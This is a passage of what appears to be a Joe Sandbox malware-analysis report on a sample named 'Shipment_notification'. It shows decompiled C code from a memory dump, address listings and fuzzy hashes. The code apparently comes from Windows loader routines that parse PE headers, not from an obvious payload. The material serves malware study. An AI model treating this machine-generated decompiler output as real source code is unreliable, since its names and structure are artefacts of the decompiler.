                                                                                																		if(_t349 == 0x20b) {
                                                                                																			goto L102;
                                                                                																		} else {
                                                                                																			_t307 = 0;
                                                                                																			_v48 = 0;
                                                                                																			_t216 = 0xc000007b;
                                                                                																			_v36 = 0xc000007b;
                                                                                																			goto L71;
                                                                                																		}
                                                                                																	} else {
                                                                                																		L102:
                                                                                																		_t307 =  *(_t306 + 0x50);
                                                                                																		goto L69;
                                                                                																	}
                                                                                																	goto L151;
                                                                                																} else {
                                                                                																	_t239 = L01AFEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                																	_t307 = _t239;
                                                                                																	_v60 = _t307;
                                                                                																	_v48 = _t307;
                                                                                																	__eflags = _t307;
                                                                                																	if(_t307 != 0) {
                                                                                																		L70:
                                                                                																		_t216 = _v36;
                                                                                																	} else {
                                                                                																		_push(_t239);
                                                                                																		_push(0x14);
                                                                                																		_push( &_v144);
                                                                                																		_push(3);
                                                                                																		_push(_v44);
                                                                                																		_push(0xffffffff);
                                                                                																		_t319 = E01B29730();
                                                                                																		_v36 = _t319;
                                                                                																		__eflags = _t319;
                                                                                																		if(_t319 < 0) {
                                                                                																			_t216 = 0xc000001f;
                                                                                																			_v36 = 0xc000001f;
                                                                                																			_t307 = _v60;
                                                                                																		} else {
                                                                                																			_t307 = _v132;
                                                                                																			L69:
                                                                                																			_v48 = _t307;
                                                                                																			goto L70;
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                															L71:
                                                                                															_v72 = _t307;
                                                                                															_v84 = _t216;
                                                                                															__eflags = _t216 - 0xc000007b;
                                                                                															if(_t216 == 0xc000007b) {
                                                                                																L150:
                                                                                																_v8 = 0xfffffffe;
                                                                                																_t211 = 0xc000007b;
                                                                                															} else {
                                                                                																_t344 = _t290 & 0xfffffffc;
                                                                                																_v76 = _t344;
                                                                                																__eflags = _v40 - _t344;
                                                                                																if(_v40 <= _t344) {
                                                                                																	goto L150;
                                                                                																} else {
                                                                                																	__eflags = _t307;
                                                                                																	if(_t307 == 0) {
                                                                                																		L75:
                                                                                																		_t217 = 0;
                                                                                																		_v104 = 0;
                                                                                																		__eflags = _t366;
                                                                                																		if(_t366 != 0) {
                                                                                																			__eflags = _t290 & 0x00000001;
                                                                                																			if((_t290 & 0x00000001) != 0) {
                                                                                																				_t217 = 1;
                                                                                																				_v104 = 1;
                                                                                																			}
                                                                                																			_t290 = _v44;
                                                                                																			_v52 = _t290;
                                                                                																		}
                                                                                																		__eflags = _t217 - 1;
                                                                                																		if(_t217 != 1) {
                                                                                																			_t369 = 0;
                                                                                																			_t218 = _v40;
                                                                                																			goto L91;
                                                                                																		} else {
                                                                                																			_v64 = 0;
                                                                                																			E01AFE9C0(1, _t290, 0, 0,  &_v64);
                                                                                																			_t309 = _v64;
                                                                                																			_v108 = _t309;
                                                                                																			__eflags = _t309;
                                                                                																			if(_t309 == 0) {
                                                                                																				goto L143;
                                                                                																			} else {
                                                                                																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                																				__eflags = _t226 - 0x10b;
                                                                                																				if(_t226 != 0x10b) {
                                                                                																					__eflags = _t226 - 0x20b;
                                                                                																					if(_t226 != 0x20b) {
                                                                                																						goto L143;
                                                                                																					} else {
                                                                                																						_t371 =  *(_t309 + 0x98);
                                                                                																						goto L83;
                                                                                																					}
                                                                                																				} else {
                                                                                																					_t371 =  *(_t309 + 0x88);
                                                                                																					L83:
                                                                                																					__eflags = _t371;
                                                                                																					if(_t371 != 0) {
                                                                                																						_v80 = _t371 - _t356 + _t290;
                                                                                																						_t310 = _v64;
                                                                                																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                																						_t311 = 0;
                                                                                																						__eflags = 0;
                                                                                																						while(1) {
                                                                                																							_v120 = _t311;
                                                                                																							_v116 = _t348;
                                                                                																							__eflags = _t311 - _t292;
                                                                                																							if(_t311 >= _t292) {
                                                                                																								goto L143;
                                                                                																							}
                                                                                																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                																							__eflags = _t371 - _t359;
                                                                                																							if(_t371 < _t359) {
                                                                                																								L98:
                                                                                																								_t348 = _t348 + 0x28;
                                                                                																								_t311 = _t311 + 1;
                                                                                																								continue;
                                                                                																							} else {
                                                                                																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                																									goto L98;
                                                                                																								} else {
                                                                                																									__eflags = _t348;
                                                                                																									if(_t348 == 0) {
                                                                                																										goto L143;
                                                                                																									} else {
                                                                                																										_t218 = _v40;
                                                                                																										_t312 =  *_t218;
                                                                                																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                																											_v100 = _t359;
                                                                                																											_t360 = _v108;
                                                                                																											_t372 = L01AF8F44(_v108, _t312);
                                                                                																											__eflags = _t372;
                                                                                																											if(_t372 == 0) {
                                                                                																												goto L143;
                                                                                																											} else {
                                                                                																												_t290 = _v52;
                                                                                																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E01B23C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                																												_t307 = _v72;
                                                                                																												_t344 = _v76;
                                                                                																												_t218 = _v40;
                                                                                																												goto L91;
                                                                                																											}
                                                                                																										} else {
                                                                                																											_t290 = _v52;
                                                                                																											_t307 = _v72;
                                                                                																											_t344 = _v76;
                                                                                																											_t369 = _v80;
                                                                                																											L91:
                                                                                																											_t358 = _a4;
                                                                                																											__eflags = _t358;
                                                                                																											if(_t358 == 0) {
                                                                                																												L95:
                                                                                																												_t308 = _a8;
                                                                                																												__eflags = _t308;
                                                                                																												if(_t308 != 0) {
                                                                                																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                																												}
                                                                                																												_v8 = 0xfffffffe;
                                                                                																												_t211 = _v84;
                                                                                																											} else {
                                                                                																												_t370 =  *_t218 - _t369 + _t290;
                                                                                																												 *_t358 = _t370;
                                                                                																												__eflags = _t370 - _t344;
                                                                                																												if(_t370 <= _t344) {
                                                                                																													L149:
                                                                                																													 *_t358 = 0;
                                                                                																													goto L150;
                                                                                																												} else {
                                                                                																													__eflags = _t307;
                                                                                																													if(_t307 == 0) {
                                                                                																														goto L95;
                                                                                																													} else {
                                                                                																														__eflags = _t370 - _t344 + _t307;
                                                                                																														if(_t370 >= _t344 + _t307) {
                                                                                																															goto L149;
                                                                                																														} else {
                                                                                																															goto L95;
                                                                                																														}
                                                                                																													}
                                                                                																												}
                                                                                																											}
                                                                                																										}
                                                                                																									}
                                                                                																								}
                                                                                																							}
                                                                                																							goto L97;
                                                                                																						}
                                                                                																					}
                                                                                																					goto L143;
                                                                                																				}
                                                                                																			}
                                                                                																		}
                                                                                																	} else {
                                                                                																		__eflags = _v40 - _t307 + _t344;
                                                                                																		if(_v40 >= _t307 + _t344) {
                                                                                																			goto L150;
                                                                                																		} else {
                                                                                																			goto L75;
                                                                                																		}
                                                                                																	}
                                                                                																}
                                                                                															}
                                                                                														}
                                                                                														L97:
                                                                                														 *[fs:0x0] = _v20;
                                                                                														return _t211;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                									} else {
                                                                                										goto L46;
                                                                                									}
                                                                                								}
                                                                                								goto L151;
                                                                                							}
                                                                                							_t288 = _v164;
                                                                                							_t366 = 0xc0000135;
                                                                                							goto L41;
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				L151:
                                                                                			}
                                                                                0x00000000
                                                                                0x01afd7d4
                                                                                0x01afd7d4
                                                                                0x01afd7d7
                                                                                0x01afd7df
                                                                                0x01b4b3d4
                                                                                0x01b4b3d9
                                                                                0x01b4b3dc
                                                                                0x01b4b3dc
                                                                                0x01b4b3df
                                                                                0x01b4b3e2
                                                                                0x01b4b468
                                                                                0x01b4b46d
                                                                                0x01b4b46f
                                                                                0x01b4b46f
                                                                                0x01b4b475
                                                                                0x01afd8f8
                                                                                0x01afd8f9
                                                                                0x01afd8fd
                                                                                0x01b4b3e8
                                                                                0x01b4b3e8
                                                                                0x01b4b3eb
                                                                                0x01b4b3ed
                                                                                0x00000000
                                                                                0x01b4b3ef
                                                                                0x01b4b3ef
                                                                                0x01b4b3f1
                                                                                0x01b4b3f4
                                                                                0x01b4b3fe
                                                                                0x01b4b404
                                                                                0x01b4b409
                                                                                0x01b4b40e
                                                                                0x01b4b410
                                                                                0x01b4b410
                                                                                0x01b4b414
                                                                                0x01b4b414
                                                                                0x01b4b41b
                                                                                0x01b4b420
                                                                                0x01b4b423
                                                                                0x01b4b425
                                                                                0x01b4b427
                                                                                0x01b4b42a
                                                                                0x01b4b42d
                                                                                0x01b4b42d
                                                                                0x01b4b42a
                                                                                0x01b4b432
                                                                                0x01b4b436
                                                                                0x01b4b438
                                                                                0x01b4b43b
                                                                                0x01b4b43b
                                                                                0x01b4b449
                                                                                0x01b4b44e
                                                                                0x01b4b454
                                                                                0x01b4b458
                                                                                0x01b4b458
                                                                                0x01b4b45d
                                                                                0x00000000
                                                                                0x01b4b45d
                                                                                0x01b4b3ed
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afd7df
                                                                                0x01afd7d2
                                                                                0x01afd7ca
                                                                                0x01b4b37c
                                                                                0x01b4b37e
                                                                                0x01b4b385
                                                                                0x01b4b38a
                                                                                0x00000000
                                                                                0x01b4b38a
                                                                                0x01afd742
                                                                                0x01afd7f1
                                                                                0x01afd7f8
                                                                                0x01b4b49b
                                                                                0x01b4b49b
                                                                                0x01afd800
                                                                                0x01afd837
                                                                                0x01afd843
                                                                                0x01afd845
                                                                                0x01afd847
                                                                                0x01afd84a
                                                                                0x01afd84b
                                                                                0x01afd84e
                                                                                0x01afd857
                                                                                0x01afd818
                                                                                0x01afd824
                                                                                0x01afd831
                                                                                0x01b4b4a5
                                                                                0x01b4b4ab
                                                                                0x01b4b4b3
                                                                                0x01b4b4b8
                                                                                0x01b4b4bb
                                                                                0x00000000
                                                                                0x01b4b4c1
                                                                                0x01b4b4c1
                                                                                0x01b4b4c8
                                                                                0x00000000
                                                                                0x01b4b4ce
                                                                                0x01b4b4d4
                                                                                0x01b4b4e1
                                                                                0x01b4b4e3
                                                                                0x01b4b4e5
                                                                                0x00000000
                                                                                0x01b4b4eb
                                                                                0x01b4b4f0
                                                                                0x01b4b4f2
                                                                                0x01afdac9
                                                                                0x01afdacc
                                                                                0x01afdacf
                                                                                0x01afdad1
                                                                                0x01afdd78
                                                                                0x01afdd78
                                                                                0x01afdcf2
                                                                                0x00000000
                                                                                0x01afdad7
                                                                                0x01afdad9
                                                                                0x01afdadb
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdae1
                                                                                0x01afdae1
                                                                                0x01afdae4
                                                                                0x01afdae6
                                                                                0x01b4b4f9
                                                                                0x01b4b4f9
                                                                                0x01b4b500
                                                                                0x01afdaec
                                                                                0x01afdaec
                                                                                0x01afdaf5
                                                                                0x01afdaf8
                                                                                0x01afdafb
                                                                                0x01afdb03
                                                                                0x01afdb11
                                                                                0x01afdb16
                                                                                0x01afdb19
                                                                                0x01afdb1b
                                                                                0x01b4b52c
                                                                                0x01b4b531
                                                                                0x01b4b534
                                                                                0x01afdb21
                                                                                0x01afdb21
                                                                                0x01afdb24
                                                                                0x01afdcd9
                                                                                0x01afdce2
                                                                                0x01afdce5
                                                                                0x01afdd6a
                                                                                0x01afdd6d
                                                                                0x00000000
                                                                                0x01afdd73
                                                                                0x01b4b51a
                                                                                0x01b4b51c
                                                                                0x01b4b51f
                                                                                0x01b4b524
                                                                                0x00000000
                                                                                0x01b4b524
                                                                                0x01afdce7
                                                                                0x01afdce7
                                                                                0x01afdce7
                                                                                0x00000000
                                                                                0x01afdce7
                                                                                0x00000000
                                                                                0x01afdb2a
                                                                                0x01afdb2c
                                                                                0x01afdb31
                                                                                0x01afdb33
                                                                                0x01afdb36
                                                                                0x01afdb39
                                                                                0x01afdb3b
                                                                                0x01afdb66
                                                                                0x01afdb66
                                                                                0x01afdb3d
                                                                                0x01afdb3d
                                                                                0x01afdb3e
                                                                                0x01afdb46
                                                                                0x01afdb47
                                                                                0x01afdb49
                                                                                0x01afdb4c
                                                                                0x01afdb53
                                                                                0x01afdb55
                                                                                0x01afdb58
                                                                                0x01afdb5a
                                                                                0x01b4b50a
                                                                                0x01b4b50f
                                                                                0x01b4b512
                                                                                0x01afdb60
                                                                                0x01afdb60
                                                                                0x01afdb63
                                                                                0x01afdb63
                                                                                0x00000000
                                                                                0x01afdb63
                                                                                0x01afdb5a
                                                                                0x01afdb3b
                                                                                0x01afdb24
                                                                                0x01afdb69
                                                                                0x01afdb69
                                                                                0x01afdb6c
                                                                                0x01afdb6f
                                                                                0x01afdb74
                                                                                0x01b4b557
                                                                                0x01b4b557
                                                                                0x01b4b55e
                                                                                0x01afdb7a
                                                                                0x01afdb7c
                                                                                0x01afdb7f
                                                                                0x01afdb82
                                                                                0x01afdb85
                                                                                0x00000000
                                                                                0x01afdb8b
                                                                                0x01afdb8b
                                                                                0x01afdb8d
                                                                                0x01afdb9b
                                                                                0x01afdb9b
                                                                                0x01afdb9d
                                                                                0x01afdba0
                                                                                0x01afdba2
                                                                                0x01afdba4
                                                                                0x01afdba7
                                                                                0x01afdba9
                                                                                0x01afdbae
                                                                                0x01afdbae
                                                                                0x01afdbb1
                                                                                0x01afdbb4
                                                                                0x01afdbb4
                                                                                0x01afdbb7
                                                                                0x01afdbba
                                                                                0x01afdcd2
                                                                                0x01afdcd4
                                                                                0x00000000
                                                                                0x01afdbc0
                                                                                0x01afdbc0
                                                                                0x01afdbd2
                                                                                0x01afdbd7
                                                                                0x01afdbda
                                                                                0x01afdbdd
                                                                                0x01afdbdf
                                                                                0x00000000
                                                                                0x01afdbe5
                                                                                0x01afdbe5
                                                                                0x01afdbee
                                                                                0x01afdbf1
                                                                                0x01b4b541
                                                                                0x01b4b544
                                                                                0x00000000
                                                                                0x01b4b546
                                                                                0x01b4b546
                                                                                0x00000000
                                                                                0x01b4b546
                                                                                0x01afdbf7
                                                                                0x01afdbf7
                                                                                0x01afdbfd
                                                                                0x01afdbfd
                                                                                0x01afdbff
                                                                                0x01afdc0b
                                                                                0x01afdc15
                                                                                0x01afdc1b
                                                                                0x01afdc1d
                                                                                0x01afdc21
                                                                                0x01afdc21
                                                                                0x01afdc23
                                                                                0x01afdc23
                                                                                0x01afdc26
                                                                                0x01afdc29
                                                                                0x01afdc2b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01afdc31
                                                                                0x01afdc34
                                                                                0x01afdc36
                                                                                0x01afdcbf
                                                                                0x01afdcbf
                                                                                0x01afdcc2
                                                                                0x00000000
                                                                                0x01afdc3c
                                                                                0x01afdc41
                                                                                0x01afdc43
                                                                                0x00000000
                                                                                0x01afdc45
                                                                                0x01afdc45
                                                                                0x01afdc47
                                                                                0x00000000
                                                                                0x01afdc4d
                                                                                0x01afdc4d
                                                                                0x01afdc50
                                                                                0x01afdc52
                                                                                0x01afdc55
                                                                                0x01afdcfa
                                                                                0x01afdcfe
                                                                                0x01afdd08
                                                                                0x01afdd0a
                                                                                0x01afdd0c
                                                                                0x00000000
                                                                                0x01afdd12
                                                                                0x01afdd15
                                                                                0x01afdd2d
                                                                                0x01afdd2f
                                                                                0x01afdd32
                                                                                0x01afdd35
                                                                                0x00000000
                                                                                0x01afdd35
                                                                                0x01afdc5b
                                                                                0x01afdc5b
                                                                                0x01afdc5e
                                                                                0x01afdc61
                                                                                0x01afdc64
                                                                                0x01afdc67
                                                                                0x01afdc67
                                                                                0x01afdc6a

                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: aaae0a2e5f0334d7a517d222edbf07cca0e472ac927d6a37820ffd474d740911
                                                                                • Instruction ID: 31c5f2225a54606d83d6b2c8cdf4d06e3b6b936aac934a0e6c66af8c6d5062b7
                                                                                • Opcode Fuzzy Hash: aaae0a2e5f0334d7a517d222edbf07cca0e472ac927d6a37820ffd474d740911
                                                                                • Instruction Fuzzy Hash: 22E1D331A01356CFEB3ACFA9C990B69BBB2BF45304F0441DDEB099B291D7349985CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 92%
                                                                                			E01AF849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                                				void* _t136;
                                                                                				signed int _t139;
                                                                                				signed int _t141;
                                                                                				signed int _t145;
                                                                                				intOrPtr _t146;
                                                                                				signed int _t149;
                                                                                				signed int _t150;
                                                                                				signed int _t161;
                                                                                				signed int _t163;
                                                                                				signed int _t165;
                                                                                				signed int _t169;
                                                                                				signed int _t171;
                                                                                				signed int _t194;
                                                                                				signed int _t200;
                                                                                				void* _t201;
                                                                                				signed int _t204;
                                                                                				signed int _t206;
                                                                                				signed int _t210;
                                                                                				signed int _t214;
                                                                                				signed int _t215;
                                                                                				signed int _t218;
                                                                                				void* _t221;
                                                                                				signed int _t224;
                                                                                				signed int _t226;
                                                                                				intOrPtr _t228;
                                                                                				signed int _t232;
                                                                                				signed int _t233;
                                                                                				signed int _t234;
                                                                                				void* _t237;
                                                                                				void* _t238;
                                                                                
                                                                                				_t236 = __esi;
                                                                                				_t235 = __edi;
                                                                                				_t193 = __ebx;
                                                                                				_push(0x70);
                                                                                				_push(0x1bbf9c0);
                                                                                				E01B3D0E8(__ebx, __edi, __esi);
                                                                                				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                                                                                				if( *0x1bd7b04 == 0) {
                                                                                					L4:
                                                                                					goto L5;
                                                                                				} else {
                                                                                					_t136 = E01AFCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                                                                                					_t236 = 0;
                                                                                					if(_t136 < 0) {
                                                                                						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                                                                                					}
                                                                                					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                                                                                						_t193 =  *( *[fs:0x30] + 0x18);
                                                                                						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                                                                                						 *(_t237 - 0x68) = _t236;
                                                                                						 *(_t237 - 0x6c) = _t236;
                                                                                						_t235 = _t236;
                                                                                						 *(_t237 - 0x60) = _t236;
                                                                                						E01B02280( *[fs:0x30], 0x1bd8550);
                                                                                						_t139 =  *0x1bd7b04; // 0x1
                                                                                						__eflags = _t139 - 1;
                                                                                						if(__eflags != 0) {
                                                                                							_t200 = 0xc;
                                                                                							_t201 = _t237 - 0x40;
                                                                                							_t141 = E01B1F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                                                                                							 *(_t237 - 0x44) = _t141;
                                                                                							__eflags = _t141;
                                                                                							if(_t141 < 0) {
                                                                                								L50:
                                                                                								E01AFFFB0(_t193, _t235, 0x1bd8550);
                                                                                								L5:
                                                                                								return E01B3D130(_t193, _t235, _t236);
                                                                                							}
                                                                                							_push(_t201);
                                                                                							_t221 = 0x10;
                                                                                							_t202 =  *(_t237 - 0x40);
                                                                                							_t145 = E01AE1C45( *(_t237 - 0x40), _t221);
                                                                                							 *(_t237 - 0x44) = _t145;
                                                                                							__eflags = _t145;
                                                                                							if(_t145 < 0) {
                                                                                								goto L50;
                                                                                							}
                                                                                							_t146 =  *0x1bd7b9c; // 0x0
                                                                                							_t235 = L01B04620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                                                                                							 *(_t237 - 0x60) = _t235;
                                                                                							__eflags = _t235;
                                                                                							if(_t235 == 0) {
                                                                                								_t149 = 0xc0000017;
                                                                                								 *(_t237 - 0x44) = 0xc0000017;
                                                                                							} else {
                                                                                								_t149 =  *(_t237 - 0x44);
                                                                                							}
                                                                                							__eflags = _t149;
                                                                                							if(__eflags >= 0) {
                                                                                								L8:
                                                                                								 *(_t237 - 0x64) = _t235;
                                                                                								_t150 =  *0x1bd7b10; // 0x0
                                                                                								 *(_t237 - 0x4c) = _t150;
                                                                                								_push(_t237 - 0x74);
                                                                                								_push(_t237 - 0x39);
                                                                                								_push(_t237 - 0x58);
                                                                                								_t193 = L01B1A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                                                                                								 *(_t237 - 0x44) = _t193;
                                                                                								__eflags = _t193;
                                                                                								if(_t193 < 0) {
                                                                                									L30:
                                                                                									E01AFFFB0(_t193, _t235, 0x1bd8550);
                                                                                									__eflags = _t235 - _t237 - 0x38;
                                                                                									if(_t235 != _t237 - 0x38) {
                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                										L01B077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                                                                                									} else {
                                                                                										_t235 =  *(_t237 - 0x48);
                                                                                									}
                                                                                									__eflags =  *(_t237 - 0x6c);
                                                                                									if( *(_t237 - 0x6c) != 0) {
                                                                                										L01B077F0(_t235, _t236,  *(_t237 - 0x6c));
                                                                                									}
                                                                                									__eflags = _t193;
                                                                                									if(_t193 >= 0) {
                                                                                										goto L4;
                                                                                									} else {
                                                                                										goto L5;
                                                                                									}
                                                                                								}
                                                                                								_t204 =  *0x1bd7b04; // 0x1
                                                                                								 *(_t235 + 8) = _t204;
                                                                                								__eflags =  *((char*)(_t237 - 0x39));
                                                                                								if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                									 *(_t235 + 4) = 1;
                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                                                                                									_t161 =  *0x1bd7b10; // 0x0
                                                                                									 *(_t237 - 0x4c) = _t161;
                                                                                								} else {
                                                                                									 *(_t235 + 4) = _t236;
                                                                                									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                                                                                								}
                                                                                								 *((intOrPtr*)(_t237 - 0x54)) = E01B237C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                                                                                								_t224 = _t236;
                                                                                								 *(_t237 - 0x40) = _t236;
                                                                                								 *(_t237 - 0x50) = _t236;
                                                                                								while(1) {
                                                                                									_t163 =  *(_t235 + 8);
                                                                                									__eflags = _t224 - _t163;
                                                                                									if(_t224 >= _t163) {
                                                                                										break;
                                                                                									}
                                                                                									_t228 =  *0x1bd7b9c; // 0x0
                                                                                									_t214 = L01B04620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                                                                                									 *(_t237 - 0x78) = _t214;
                                                                                									__eflags = _t214;
                                                                                									if(_t214 == 0) {
                                                                                										L52:
                                                                                										_t193 = 0xc0000017;
                                                                                										L19:
                                                                                										 *(_t237 - 0x44) = _t193;
                                                                                										L20:
                                                                                										_t206 =  *(_t237 - 0x40);
                                                                                										__eflags = _t206;
                                                                                										if(_t206 == 0) {
                                                                                											L26:
                                                                                											__eflags = _t193;
                                                                                											if(_t193 < 0) {
                                                                                												E01B237F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                												if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                													 *0x1bd7b10 =  *0x1bd7b10 - 8;
                                                                                												}
                                                                                											} else {
                                                                                												_t169 =  *(_t237 - 0x68);
                                                                                												__eflags = _t169;
                                                                                												if(_t169 != 0) {
                                                                                													 *0x1bd7b04 =  *0x1bd7b04 - _t169;
                                                                                												}
                                                                                											}
                                                                                											__eflags = _t193;
                                                                                											if(_t193 >= 0) {
                                                                                												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                                                                                											}
                                                                                											goto L30;
                                                                                										}
                                                                                										_t226 = _t206 * 0xc;
                                                                                										__eflags = _t226;
                                                                                										_t194 =  *(_t237 - 0x48);
                                                                                										do {
                                                                                											 *(_t237 - 0x40) = _t206 - 1;
                                                                                											_t226 = _t226 - 0xc;
                                                                                											 *(_t237 - 0x4c) = _t226;
                                                                                											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                                                                                											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                                                                                												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                                                                                												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                                                                                													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                                                                                													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                													__eflags =  *((char*)(_t237 - 0x39));
                                                                                													if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                														_t171 = _t210;
                                                                                													} else {
                                                                                														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                                                                                														L01B077F0(_t194, _t236, _t210 - 8);
                                                                                														_t171 =  *(_t237 - 0x50);
                                                                                													}
                                                                                													L48:
                                                                                													L01B077F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                                                                                													L46:
                                                                                													_t206 =  *(_t237 - 0x40);
                                                                                													_t226 =  *(_t237 - 0x4c);
                                                                                													goto L24;
                                                                                												}
                                                                                												 *0x1bd7b08 =  *0x1bd7b08 + 1;
                                                                                												goto L24;
                                                                                											}
                                                                                											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                                                                                											__eflags = _t171;
                                                                                											if(_t171 != 0) {
                                                                                												__eflags =  *((char*)(_t237 - 0x39));
                                                                                												if( *((char*)(_t237 - 0x39)) == 0) {
                                                                                													goto L48;
                                                                                												}
                                                                                												E01B257C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                                                                                												goto L46;
                                                                                											}
                                                                                											L24:
                                                                                											__eflags = _t206;
                                                                                										} while (_t206 != 0);
                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                										goto L26;
                                                                                									}
                                                                                									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                                                                                									 *(_t237 - 0x7c) = _t232;
                                                                                									 *(_t232 - 4) = _t214;
                                                                                									 *(_t237 - 4) = _t236;
                                                                                									E01B2F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                                                                                									_t238 = _t238 + 0xc;
                                                                                									 *(_t237 - 4) = 0xfffffffe;
                                                                                									_t215 =  *(_t237 - 0x48);
                                                                                									__eflags = _t193;
                                                                                									if(_t193 < 0) {
                                                                                										L01B077F0(_t215, _t236,  *(_t237 - 0x78));
                                                                                										goto L20;
                                                                                									}
                                                                                									__eflags =  *((char*)(_t237 - 0x39));
                                                                                									if( *((char*)(_t237 - 0x39)) != 0) {
                                                                                										_t233 = E01B1A44B( *(_t237 - 0x4c));
                                                                                										 *(_t237 - 0x50) = _t233;
                                                                                										__eflags = _t233;
                                                                                										if(_t233 == 0) {
                                                                                											L01B077F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                                                                                											goto L52;
                                                                                										}
                                                                                										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                                                                                										L17:
                                                                                										_t234 =  *(_t237 - 0x40);
                                                                                										_t218 = _t234 * 0xc;
                                                                                										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                                                                                										 *(_t218 + _t235 + 0x10) = _t236;
                                                                                										_t224 = _t234 + 1;
                                                                                										 *(_t237 - 0x40) = _t224;
                                                                                										 *(_t237 - 0x50) = _t224;
                                                                                										_t193 =  *(_t237 - 0x44);
                                                                                										continue;
                                                                                									}
                                                                                									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                                                                                									goto L17;
                                                                                								}
                                                                                								 *_t235 = _t236;
                                                                                								_t165 = 0x10 + _t163 * 0xc;
                                                                                								__eflags = _t165;
                                                                                								_push(_t165);
                                                                                								_push(_t235);
                                                                                								_push(0x23);
                                                                                								_push(0xffffffff);
                                                                                								_t193 = L01B296C0();
                                                                                								goto L19;
                                                                                							} else {
                                                                                								goto L50;
                                                                                							}
                                                                                						}
                                                                                						_t235 = _t237 - 0x38;
                                                                                						 *(_t237 - 0x60) = _t235;
                                                                                						goto L8;
                                                                                					}
                                                                                					goto L4;
                                                                                				}
                                                                                			}


































                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: f99fcff250d99b2a184d98aaebb935047715177d7bbc72a56cfdbc73c71df0a9
                                                                                • Instruction ID: d786d3b21bb1e7245217d6363f6e1d24ffdcaafe2670cc752f55f2f907db4f7e
                                                                                • Opcode Fuzzy Hash: f99fcff250d99b2a184d98aaebb935047715177d7bbc72a56cfdbc73c71df0a9
                                                                                • Instruction Fuzzy Hash: 95B15A70E00209DFDF29DFE9C994AAEBBB5FF48304F14816DE605AB245DB74A845CB90
                                                                                Uniqueness

